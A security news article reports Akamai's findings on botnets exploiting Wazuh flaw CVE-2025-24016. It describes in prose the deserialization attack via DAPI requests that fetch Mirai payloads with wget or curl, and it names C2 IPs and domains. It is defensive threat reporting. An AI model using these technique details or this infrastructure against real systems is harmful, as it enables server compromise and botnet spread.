Mirai Variants Deployed Through Exploited Critical RCE Flaw in Wazuh Server

The Akamai Security Intelligence and Response Team (SIRT) has uncovered large-scale, active exploitation of the critical remote code execution (RCE) vulnerability CVE-2025-24016 (CVSS 9.9), specifically targeting Wazuh servers.

This flaw, present in Wazuh versions 4.4.0 through 4.9.0 and patched in 4.9.1, enables remote attackers with API access to execute arbitrary code via unsanitized JSON dictionaries in DistributedAPI (DAPI) requests.

The exploitation enables adversaries to upload malicious payloads, giving them direct execution control with minimal authentication barriers.

Attack Mechanics

Following the disclosure of CVE-2025-24016 in February 2025, Akamai’s global honeynet detected the first exploitation attempts in March, marking an alarmingly short time-to-exploit.

The attack chain largely revisits techniques outlined in proof-of-concept (PoC) code, wherein offenders craft DAPI requests to endpoints such as /security/user/authenticate/run_as, embedding payloads that abuse Python’s unsafe deserialization for system-level command execution.

Typical exploitation involves the use of a Base64-encoded authorization header and a JSON object that forces Python’s os.system to download and execute remote shell scripts, commonly invoking wget or curl to fetch malware.

Akamai has identified two distinct botnet campaigns leveraging this vulnerability. The first campaign, characterized by the deployment of multiple Mirai variants (notably “morte” and LZRD-based strains), deploys architecture-specific binaries to maximize propagation across IoT devices.

The initial infection vector downloads a shell script from infrastructure such as 176.65.134.62, which in turn retrieves various Mirai payloads targeting platforms including ARM, MIPS, x86, PPC, and others.

Network telemetry tied to this Mirai campaign reveals links to several dynamic C2 domains (nuklearcnc.duckdns[.]org, cbot.galaxias[.]cc, and more), with threat actors using dynamic DNS and rapidly shifting infrastructure to evade basic blacklists.

Malware samples are easily identified by unique console output strings such as “lzrd here” or by referencing previous Mirai variants’ code signatures.

Resbot/Resentual Botnet

A second campaign, dubbed Resbot or Resentual, emerged in May 2025, deploying a new Mirai variant labeled “resgod.”

This campaign differs in its operational details, using domains with Italian linguistic patterns (e.g., gestisciweb.com), suggesting either a geographic focus or a social engineering angle targeting Italian-speaking administrators.

The Resbot botnet is associated with fast-spreading capabilities via telnet and FTP, alongside hardcoded C2 callbacks to IPs such as 104.168.101.27.

Both botnets expanded their reach by simultaneously exploiting other known device vulnerabilities, including CVE-2023-1389 (TP-Link Archer AX21), CVE-2017-17215 (Huawei HG532), and CVE-2017-18368 (ZyXEL routers), among others.

These campaigns underscore the critical need for immediate patching of Wazuh servers to version 4.9.1 or later.

The exploitation of this RCE is not limited to theoretical risk—botnet operators are acting with speed and coordination, often adapting PoC code into live attacks within days of public release.

Organizations running outdated Wazuh deployments are advised to prioritize remediation, implement network detection rules for known C2 infrastructure, and proactively monitor for IoCs outlined below.

Key Indicators of Compromise (IOCs)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Update